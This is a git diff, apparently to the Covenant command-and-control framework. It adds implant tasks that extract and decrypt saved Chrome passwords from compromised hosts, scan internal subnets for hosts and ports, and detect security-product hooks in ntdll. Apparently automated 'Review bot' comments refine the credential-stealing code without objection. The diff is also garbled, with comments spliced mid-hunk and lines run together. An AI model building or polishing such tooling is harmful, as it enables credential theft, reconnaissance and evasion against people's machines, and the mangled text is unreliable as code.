diff --git a/.gitmodules b/.gitmodules
index 6debcc64..3957fa75 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -30,3 +30,9 @@
 path = Covenant/Data/ReferenceSourceLibraries/SharpSC
 url = https://github.com/djhohnstein/SharpSC
 ignore = dirty
+[submodule "Covenant/Data/ReferenceSourceLibraries/NET-scan"]
+ path = Covenant/Data/ReferenceSourceLibraries/NET-scan
+ url = https://github.com/khraoverflow/NET-scan
+[submodule "Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor"]
+ path = Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor
+ url = https://github.com/khraoverflow/ChromeDecryptor
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1cf0136c..40932da8 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -149,6 +149,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - Fixed Docker build Covenant.API project
 - Fixed low max file upload size for InputFile component
 - Fixed DateTimePicker for KillDate doesn't change via UI
+- Fixed missing DonutCore nuget package
 
 ## [v0.6] - 2020-08-04
 ### Added
diff --git a/Covenant/Components/Grunts/GruntCommandCard.razor b/Covenant/Components/Grunts/GruntCommandCard.razor
index 87c1a7b3..0739d4f0 100644
--- a/Covenant/Components/Grunts/GruntCommandCard.razor
+++ b/Covenant/Components/Grunts/GruntCommandCard.razor
@@ -57,6 +57,23 @@ else if (GruntCommand.GruntTasking.Status == GruntTaskingStatus.Completed) {
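Review bot: The two new submodule entries omit the `ignore = dirty` line that the SharpSC entry above them carries, so their checkouts will show as modified in `git status` after a build while the existing libraries stay clean; add `ignore = dirty` under each new entry for consistency. Both URLs point at a personal GitHub account and the code is compiled into task assemblies, so the gitlink commits recorded later in this commit (`30e4040e…` and `8666bed9…`) are the only thing pinning what gets built; treat any future bump of those gitlinks as a dependency review rather than a routine sync.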

Download completed: @if (download != null){@download.FileName}

} } + else if (GruntCommand.GruntTasking != null && GruntCommand.GruntTasking.GruntTask != null && GruntCommand.GruntTasking.GruntTask.Name == "Chrome_passwords") + { + if (GruntCommand.GruntTasking.Status == GruntTaskingStatus.Progressed) + { +

Decrypting...

+ } + else if (GruntCommand.GruntTasking.Status == GruntTaskingStatus.Completed) + { + DecryptEvent decryptEvent = GetDecryptEvent(GruntCommand).WaitResult(); +

Decrypted : @if (decryptEvent != null) + { +

@decryptEvent.DecryptedOutput

+ } +

+ } + } + else if (GruntCommand.CommandOutput != null) {

@GruntCommand.CommandOutput.Output
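Review bot: `GetDecryptEvent(GruntCommand).WaitResult()` in the Completed branch blocks the render path on a Task even though the new GetDecryptEvent body in the next hunk contains no await; either make that helper synchronous and call it directly, or await it in the component's async lifecycle and render the stored result. The `decryptEvent != null` guard after it can never trigger: GetDecryptEvent always returns a freshly constructed DecryptEvent, and the null that actually matters — `GruntCommand.CommandOutput` — is dereferenced inside GetDecryptEvent before this guard runs, so add `&& GruntCommand.CommandOutput != null` to the `else if` condition the way the CommandOutput branch below does. The task name is compared with ordinal `==` here but with `StringComparison.CurrentCultureIgnoreCase` in CovenantService; use `StringComparison.Ordinal` in both so the UI and the service agree on which taskings are decrypt taskings. The enclosing markup block starts before this hunk.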

@@ -168,7 +185,28 @@
 return ev;
 }
 }
- catch { return null; }
+ catch { return null; }
+ }
+
+ private async Task GetDecryptEvent(GruntCommand command)
+ {
+
+ //try
+ //{
+ // lock (_serviceLock)
+ // {
+ // DecryptEvent ev = Service.GetDecryptEventByGruntCommand(command.Id).WaitResult();
+ // Service.DisposeContext();
+ // return ev;
+ // }
+ //}
+ //catch { return null; }
+
+ DecryptEvent dec = new DecryptEvent();
+
+ dec.EncryptedOutput = command.CommandOutput.Output;
+ dec.Decrypt();
+ return dec;
 }
 
 private ScreenshotEvent GetScreenshotEvent(GruntCommand command)
diff --git a/Covenant/Core/CovenantHubService.cs b/Covenant/Core/CovenantHubService.cs
index e2e742f9..561dca8f 100644
--- a/Covenant/Core/CovenantHubService.cs
+++ b/Covenant/Core/CovenantHubService.cs
@@ -259,6 +259,10 @@ public Task CreateScreenshotEvent(ScreenshotEventContent screen
 {
 return _connection.InvokeAsync("CreateScreenshotEvent", screenshotEvent);
 }
+ public Task CreateDecryptEvent(DecryptEventContent decryptEvent)
+ {
+ return _connection.InvokeAsync("CreateDecryptEvent", decryptEvent);
+ }
 
 public Task CreateTicketCredential(CapturedTicketCredential credential)
 {
@@ -1085,6 +1089,18 @@ public Task> GetScreenshotEvents()
 return _connection.InvokeAsync>("GetScreenshotEvents");
 }
 
+ public Task GetDecryptEvent(int eventId)
+ {
+ return _connection.InvokeAsync("GetDecryptEvent", eventId);
+ }
+ + + public Task> GetDecryptEvents()
+ {
+ return _connection.InvokeAsync>("GetDecryptEvents");
+ }
+
 public Task GetShellCodeLauncher()
 {
 return _connection.InvokeAsync("GetShellCodeLauncher");
@@ -1234,5 +1250,10 @@ public Task ResetCovenantToFactoryDefault(ClaimsPrincipal principal)
 {
 return _connection.InvokeAsync("ResetCovenantToFactoryDefault", principal);
 }
+
+ public Task GetDecryptEventByGruntCommand(int id)
+ {
+ return _connection.InvokeAsync("GetDecryptEventByGruntCommand", id);
+ }
 }
 }
\ No newline at end of file
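Review bot: `GetDecryptEvent` is declared `async` but contains no `await`, so it compiles with warning CS1998 and runs synchronously while still allocating a Task; drop `async` and return `Task.FromResult(dec)`, or return the DecryptEvent directly and adjust the caller. The commented-out Service/lock block above the body should be deleted rather than shipped — it records the approach this commit abandoned, and the server-side lookup it references now exists in CovenantService. `command.CommandOutput.Output` is read without a null check although the markup's sibling branch guards `GruntCommand.CommandOutput != null`; add `if (command?.CommandOutput == null) return null;` before constructing `dec`, which also gives the markup's null test something to catch. The `- catch { return null; }` / `+ catch { return null; }` pair is a whitespace-only change that should be reverted to keep the diff focused.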
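Review bot: `GetDecryptEventByGruntCommand` is appended after `ResetCovenantToFactoryDefault` at the end of the class in the third hunk, while `GetDecryptEvent` and `GetDecryptEvents` land next to the screenshot proxies in the second hunk; move it beside them so the DecryptEvent proxies stay grouped the way the ScreenshotEvent ones are. The second hunk also leaves a run of blank lines between `GetDecryptEvent` and `GetDecryptEvents` where the file otherwise uses one. The InvokeAsync bodies themselves mirror the screenshot methods and need no change.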
diff --git a/Covenant/Core/CovenantService.cs b/Covenant/Core/CovenantService.cs
index d83e5422..c98f5e93 100644
--- a/Covenant/Core/CovenantService.cs
+++ b/Covenant/Core/CovenantService.cs
@@ -25,6 +25,7 @@ using Covenant.Models.Grunts;
 using Covenant.Models.Indicators;
 using NLog;
+using Org.BouncyCastle.Crypto;
 
 namespace Covenant.Core
 {
@@ -87,6 +88,10 @@ public interface IEventService
 Task GetScreenshotEventByGruntCommand(int id);
 Task CreateScreenshotEvent(ScreenshotEventContent screenshotEvent);
 Task DeleteEvent(int id);
+ Task> GetDecryptEvents();
+ Task GetDecryptEventByGruntCommand(int id);
+ Task GetDecryptEvent(int eventId);
+ Task CreateDecryptEvent(DecryptEventContent decryptEvent);
 }
 
 public interface IImplantTemplateService
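Review bot: `using Org.BouncyCastle.Crypto;` is added to CovenantService.cs, but no BouncyCastle type appears in any of this file's hunks — the decryption is delegated to `decryptEvent.Decrypt()` on the model — so the directive looks like an IDE auto-import; remove it unless code outside these hunks needs it, since an unused crypto namespace in a service class tends to attract ad-hoc primitives that belong in the DecryptEvent model. The same applies to `using YamlDotNet.Core;` and `using Microsoft.AspNetCore.Mvc.ViewComponents;` added to DbInitializer.cs below, neither of which is referenced by the ReferenceSourceLibrary entries that this commit adds there. The new IEventService members follow the screenshot signatures and need no change.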
@@ -1014,6 +1019,61 @@ public async Task CreateScreenshotEvent(ScreenshotEventContent
 return await this.GetScreenshotEvent(screenshotEvent.Id);
 }
 
+ public async Task> GetDecryptEvents()
+ {
+
+ return await _context.Events.Where(E => E.Type == EventType.Decrypt).Select(E => (DecryptEvent)E).ToListAsync();
+ }
+
+ public async Task GetDecryptEvent(int eventId)
+ {
+ DecryptEvent anEvent = (DecryptEvent)await _context.Events.FirstOrDefaultAsync(E => E.Id == eventId && E.Type == EventType.Decrypt);
+ if (anEvent == null)
+ {
+ throw new ControllerNotFoundException($"NotFound - DecryptEvent with id: {eventId}");
+ }
+ return anEvent;
+ }
+
+ public async Task GetDecryptEventByGruntCommand(int id)
+ {
+ DecryptEvent anEvent = await _context.Events
+ .Where(E => E.Type == EventType.Decrypt)
+ .Select(E => (DecryptEvent)E)
+ .FirstOrDefaultAsync(E => E.GruntCommandId == id);
+ if (anEvent == null)
+ {
+ throw new ControllerNotFoundException($"NotFound - DecryptEvent with GruntCommandId: {id}");
+ }
+ return anEvent;
+ }
+
+ private async Task CreateDecryptEvent(DecryptEvent DecryptEvent, string contents)
+ {
+ return await this.CreateDecryptEvent(new DecryptEventContent
+ {
+ Name = DecryptEvent.Name,
+ GruntCommandId = DecryptEvent.GruntCommandId,
+ Time = DecryptEvent.Time,
+ MessageHeader = DecryptEvent.MessageHeader,
+ MessageBody = DecryptEvent.MessageBody,
+ Level = DecryptEvent.Level,
+ Context = DecryptEvent.Context,
+ EncryptedOutput = contents
+ });
+ }
+
+ public async Task CreateDecryptEvent(DecryptEventContent decryptEvent)
+ {
+ decryptEvent.Time = DateTime.UtcNow;
+
+ decryptEvent.Decrypt();
+ await _context.Events.AddAsync(decryptEvent);
+ await _context.SaveChangesAsync();
+ await _notifier.NotifyCreateEvent(this, decryptEvent);
+ return await this.GetDecryptEvent(decryptEvent.Id);
+ }
+
 public async Task DeleteEvent(int id)
 {
 Event e = await this.GetEvent(id);
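Review bot: The private `CreateDecryptEvent(DecryptEvent DecryptEvent, string contents)` overload builds the content with `EncryptedOutput = contents` and discards `DecryptEvent.EncryptedOutput`, and its only caller in the next hunk passes `""` as contents after setting EncryptedOutput on the object, so the stored event has an empty EncryptedOutput and `Decrypt()` runs on nothing — unless Decrypt() reads a different field, which is not visible here. Either drop the `contents` parameter and write `EncryptedOutput = DecryptEvent.EncryptedOutput`, or make the caller pass the output through `contents`, but not both half-way. `CreateDecryptEvent(DecryptEventContent)` calls `decryptEvent.Decrypt()` and then persists and broadcasts the event via `_context.Events.AddAsync` and `_notifier.NotifyCreateEvent`, so the plaintext result lives in the events table and reaches every notification subscriber; state that on the method, e.g. `/// Decrypts EncryptedOutput in place and persists the event with its plaintext; every event consumer can read it.`, so access to the events feed is scoped accordingly. The parameter name `DecryptEvent` shadows the type name — rename it `decryptEvent` to match the public overload — and `GetDecryptEvents` carries a stray blank line before its return.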
@@ -3187,6 +3247,21 @@ public static string Execute()
 Progress = DownloadEvent.DownloadProgress.Portion
 }, new byte[] { });
 }
+ else if (tasking.GruntTask.Name.Equals("Chrome_passwords", StringComparison.CurrentCultureIgnoreCase))
+ {
+
+ DecryptEvent Decrypt = await this.CreateDecryptEvent(new DecryptEvent
+ {
+ GruntCommandId = tasking.GruntCommandId,
+ // Time = updatingGruntTasking.CompletionTime,
+ MessageHeader = "Getting saved passwords",
+ MessageBody = "Decrypted passwords: " + tasking.GruntCommand.CommandOutput.Output,
+ EncryptedOutput = tasking.GruntCommand.CommandOutput.Output,
+ Level = EventLevel.Info,
+ Context = tasking.Grunt.Name,
+
+ }, "") ;
+ }
 tasking.Parameters = parameters;
 
 try
diff --git a/Covenant/Core/DbInitializer.cs b/Covenant/Core/DbInitializer.cs
index 59783ba5..2e37586b 100644
--- a/Covenant/Core/DbInitializer.cs
+++ b/Covenant/Core/DbInitializer.cs
@@ -18,6 +18,8 @@ using Covenant.Models.Covenant;
 using Covenant.Models.Listeners;
 using Covenant.Models.Grunts;
+using YamlDotNet.Core;
+using Microsoft.AspNetCore.Mvc.ViewComponents;
 
 namespace Covenant.Core
 {
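Review bot: `DecryptEvent Decrypt = await this.CreateDecryptEvent(...)` assigns a local that is never read; write `await this.CreateDecryptEvent(...)` instead, and drop the stray space in `"") ;`, the empty line inside the initializer and the commented `// Time = updatingGruntTasking.CompletionTime,` line. `MessageBody = "Decrypted passwords: " + tasking.GruntCommand.CommandOutput.Output` copies the whole raw task output into the event's message text on top of `EncryptedOutput`, so the event feed and notifications carry the payload twice; keep MessageBody to a summary such as `"Chrome password task output received from " + tasking.Grunt.Name` and leave the data in EncryptedOutput/DecryptedOutput. `Name.Equals("Chrome_passwords", StringComparison.CurrentCultureIgnoreCase)` is a culture-sensitive comparison of a fixed identifier; use `StringComparison.OrdinalIgnoreCase`, and note that GruntCommandCard.razor matches the same name with `==`, so the two disagree for any casing variant. The enclosing method starts and ends outside this hunk.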
@@ -335,6 +337,38 @@ await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.Dot await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net40) }, EmbeddedResources = new List() + }, + new ReferenceSourceLibrary + { + Name = "NET-scan", Description = "network host and port scanner ", + Location = "NET-scan" + Path.DirectorySeparatorChar, + CompatibleDotNetVersions = new List{Common.DotNetVersion.Net40,Common.DotNetVersion.Net35}, + ReferenceAssemblies = new List + { + await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35), + await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40), + await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net35), + await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net40), + await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35), + await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40) + }, + EmbeddedResources = new List() + }, + new ReferenceSourceLibrary + { + Name = "ChromeDecryptor", Description = "Chrome password extrating tool ", + Location = "ChromeDecryptor" + Path.DirectorySeparatorChar, + CompatibleDotNetVersions = new List{Common.DotNetVersion.Net40,Common.DotNetVersion.Net35}, + ReferenceAssemblies = new List + { + await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35), + await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40), + await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net35), + await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net40), + await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35), + await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40) + }, + EmbeddedResources = new List() } }; await 
service.CreateReferenceSourceLibraries(ReferenceSourceLibraries); diff --git a/Covenant/Covenant.csproj b/Covenant/Covenant.csproj index 1c54ddf4..0bd8e781 100644 --- a/Covenant/Covenant.csproj +++ b/Covenant/Covenant.csproj @@ -29,6 +29,8 @@ + + diff --git a/Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor b/Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor new file mode 160000 index 00000000..30e4040e --- /dev/null +++ b/Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor @@ -0,0 +1 @@ +Subproject commit 30e4040e062e06d77e3c618d83e07800f23d0ee3 diff --git a/Covenant/Data/ReferenceSourceLibraries/NET-scan b/Covenant/Data/ReferenceSourceLibraries/NET-scan new file mode 160000 index 00000000..8666bed9 --- /dev/null +++ b/Covenant/Data/ReferenceSourceLibraries/NET-scan @@ -0,0 +1 @@ +Subproject commit 8666bed92ad5f075f5ba01fe2ebdbd4d40997da5 diff --git a/Covenant/Data/Tasks/Chrome_passwords.yaml b/Covenant/Data/Tasks/Chrome_passwords.yaml new file mode 100644 index 00000000..12ab9d29 --- /dev/null +++ b/Covenant/Data/Tasks/Chrome_passwords.yaml 
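Review bot: Both new `ReferenceSourceLibrary` entries have trailing whitespace in their Description strings and one has a typo — `Description = "Chrome password extrating tool "` should be `"Chrome password extracting tool"` and `"network host and port scanner "` should lose the trailing space — and these descriptions also differ from the Description fields in the matching task YAML files added by this commit, which the UI may show next to each other. `CompatibleDotNetVersions = new List{Common.DotNetVersion.Net40,Common.DotNetVersion.Net35}` is run together without spaces; format it as `new List<Common.DotNetVersion> { Common.DotNetVersion.Net40, Common.DotNetVersion.Net35 }` in both entries. The enclosing initializer list starts before this hunk.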
@@ -0,0 +1,170 @@ +- Name: Chrome_passwords + Aliases: [] + Description: get Chrome stored passwords + Author: + Name: amine brahmi + Handle: khraoverflow + Link: https://twitter.com/dr_whoami_ + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: | + using System; + using System.IO; + using System.Reflection; + using System.Threading; + + using ChromeDecryptor; + + + public static class Task + { + public static Stream OutputStream { get; set; } + public static string Execute(string Command) + { + + + try + { + + TextWriter realStdOut = Console.Out; + TextWriter realStdErr = Console.Error; + StreamWriter stdOutWriter = new StreamWriter(OutputStream); + StreamWriter stdErrWriter = new StreamWriter(OutputStream); + stdOutWriter.AutoFlush = true; + stdErrWriter.AutoFlush = true; + Console.SetOut(stdOutWriter); + Console.SetError(stdErrWriter); + + string[] args = Command.Split(' '); + typeof(ChromeDecryptor.Program).GetMethod("Main", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { args }); + + Console.Out.Flush(); + Console.Error.Flush(); + Console.SetOut(realStdOut); + Console.SetError(realStdErr); + + OutputStream.Close(); + return ""; + } + catch (Exception e) + { + + return e.Message; + } + } + + } + + + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Command + Value: '' + DefaultValue: '' + Description: path to files + SuggestedValues: [] + Optional: true + DisplayInCommand: false + FileOption: false + ReferenceSourceLibraries: + - Name: ChromeDecryptor + Description: a .NET assembly to gather saved browser creds + Location: ChromeDecryptor\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: 
System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + EmbeddedResources: [] + ReferenceAssemblies: + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: 
Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + EmbeddedResources: [] + diff --git a/Covenant/Data/Tasks/HookDetector.yaml b/Covenant/Data/Tasks/HookDetector.yaml new file mode 100644 index 00000000..3741d78a --- /dev/null +++ b/Covenant/Data/Tasks/HookDetector.yaml 
@@ -0,0 +1,51 @@ +- Author: + Name: amine brahmi + Handle: khraoverflow + Link: https://twitter.com/dr_whoami_ + Name: HookDetector + Aliases: [] + Description: gets list of hooked functions + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing System.Linq;\nusing System.Collections.Generic;\n\nclass Task\n{\n static string[] functions =\n {\n \"NtClose\",\n \"NtAllocateVirtualMemory\",\n \"NtAllocateVirtualMemoryEx\",\n \"NtCreateThread\",\n \"NtCreateThreadEx\",\n \"NtCreateUserProcess\",\n \"NtFreeVirtualMemory\",\n \"NtLoadDriver\",\n \"NtMapViewOfSection\",\n \"NtOpenProcess\",\n \"NtProtectVirtualMemory\",\n \"NtQueueApcThread\",\n \"NtQueueApcThreadEx\",\n \"NtResumeThread\",\n \"NtSetContextThread\",\n \"NtSetInformationProcess\",\n \"NtSuspendThread\",\n \"NtUnloadDriver\",\n \"NtWriteVirtualMemory\"\n };\n static byte[] safeBytes = {\n 0x4c, 0x8b, 0xd1, // mov r10, rcx\n 0xb8 // mov eax, ??\n };\n\n static string output = \"\";\n public static string Execute()\n {\n \n if (!GetProcessArch())\n {\n\n output += Environment.NewLine + \"[-] It looks like you're not running x64.\";\n return output;;\n }\n // Get the base address of ntdll.dll in our own process\n IntPtr ntdllBase = GetNTDLLBase();\n if (ntdllBase == IntPtr.Zero)\n {\n output += Environment.NewLine + \"[-] Couldn't get find ntdll.dll\";\n return output;;\n\n }\n else { output += Environment.NewLine + \"NTDLL Base Address: 0x{0:X}\" + ntdllBase.ToInt64(); }\n\n // Get the address of each of the target functions in ntdll.dll\n IDictionary funcAddresses = GetFuncAddress(ntdllBase, functions);\n\n // Check the first DWORD at each function's address for proper SYSCALL setup\n int i = 0; // Used for populating the results array\n bool safe;\n foreach (KeyValuePair func in funcAddresses)\n {\n byte[] instructions = new byte[4];\n Marshal.Copy(func.Value, instructions, 0, 4);\n\n string 
fmtFunc = string.Format(\" {0,-25} 0x{1:X} \", func.Key, func.Value.ToInt64());\n safe = instructions.SequenceEqual(safeBytes);\n\n if (safe)\n {\n output += Environment.NewLine + fmtFunc + \"- SAFE\";\n }\n else\n {\n byte[] hookInstructions = new byte[32];\n Marshal.Copy(func.Value, hookInstructions, 0, 32);\n output += Environment.NewLine + fmtFunc + \" - HOOK DETECTED\";\n output += Environment.NewLine + \" {0,-25} {1}\" + \"Instructions: \" + BitConverter.ToString(hookInstructions).Replace(\"-\", \" \");\n }\n\n i++;\n }\n return output;\n }\n\n static IntPtr GetNTDLLBase()\n {\n Process hProc = Process.GetCurrentProcess();\n ProcessModule module = hProc.Modules.Cast().SingleOrDefault(m => string.Equals(m.ModuleName, \"ntdll.dll\", StringComparison.OrdinalIgnoreCase));\n return module?.BaseAddress ?? IntPtr.Zero;\n }\n\n static IDictionary GetFuncAddress(IntPtr hModule, string[] functions)\n {\n IDictionary funcAddresses = new Dictionary();\n foreach (string function in functions)\n {\n IntPtr funcPtr = Win32.GetProcAddress(hModule, function);\n if (funcPtr != IntPtr.Zero)\n {\n funcAddresses.Add(function, funcPtr);\n }\n else\n {\n output += Environment.NewLine + \"[-] Couldn't locate the address for {0}! 
(Error: {1})\"+ function+ Marshal.GetLastWin32Error();\n }\n }\n\n return funcAddresses;\n }\n\n static bool GetProcessArch()\n {\n // Make sure that we're running x64 on x64\n bool wow64;\n Win32.IsWow64Process(Process.GetCurrentProcess().Handle, out wow64);\n\n //if (Environment.Is64BitProcess && !wow64)\n //{\n // return true;\n //}\n //else\n //{\n // return false;\n //}\n return true;\n\n }\n}\n\nclass Win32\n{\n [DllImport(\"kernel32\", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]\n public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n\n [DllImport(\"kernel32.dll\", SetLastError = true, CallingConvention = CallingConvention.Winapi)]\n public static extern bool IsWow64Process(IntPtr hProcess, out bool Wow64Process);\n}\n" + Compiled: false + TaskingType: Assembly + ReferenceSourceLibraries: [] + ReferenceAssemblies: + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.Drawing.dll + Location: net35\System.Drawing.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.Drawing.dll + Location: net40\System.Drawing.dll + DotNetVersion: Net40 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + EmbeddedResources: [] + UnsafeCompile: false + TokenTask: false + Options: [] diff --git a/Covenant/Data/Tasks/NET-scan.yaml b/Covenant/Data/Tasks/NET-scan.yaml new file mode 100644 index 00000000..15b03360 --- /dev/null +++ b/Covenant/Data/Tasks/NET-scan.yaml 
@@ -0,0 +1,168 @@ +- Name: NET-scan + Aliases: [] + Description: Use a NET-scan command. + Author: + Name: amine brahmi + Handle: khraoverflow + Link: https://twitter.com/dr_whoami_ + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: | + using System; + using System.IO; + using System.Reflection; + using System.Threading; + + using NET_scan; + + public static class Task + { + public static Stream OutputStream { get; set; } + public static string Execute(string Command) + { + try + { + TextWriter realStdOut = Console.Out; + TextWriter realStdErr = Console.Error; + StreamWriter stdOutWriter = new StreamWriter(OutputStream); + StreamWriter stdErrWriter = new StreamWriter(OutputStream); + stdOutWriter.AutoFlush = true; + stdErrWriter.AutoFlush = true; + Console.SetOut(stdOutWriter); + Console.SetError(stdErrWriter); + + string[] args = Command.Split(' '); + typeof(net_scan.Program).GetMethod("Main", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { args }); + + + Console.Out.Flush(); + Console.Error.Flush(); + Console.SetOut(realStdOut); + Console.SetError(realStdErr); + + OutputStream.Close(); + return ""; + } + catch (Exception e) + { + if (OutputStream != null) + { + OutputStream.Close(); + } + return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; + } + } + } + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Command + Value: '' + DefaultValue: '' + Description: NET-scan command to execute, the command should be inside quotes, followed (optionally) by timeout to wait for output. + SuggestedValues: + - hosts -r 192.168.1-2.1-254 -p 445 + - ports -h 192.168.56.1 -p 1000 + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: NET-scan + Description: NET-scan is a .NET assembly to perform host discovery based on a mass port scan , and a port scanner. 
+ Location: NET-scan\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + EmbeddedResources: [] + ReferenceAssemblies: + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: 
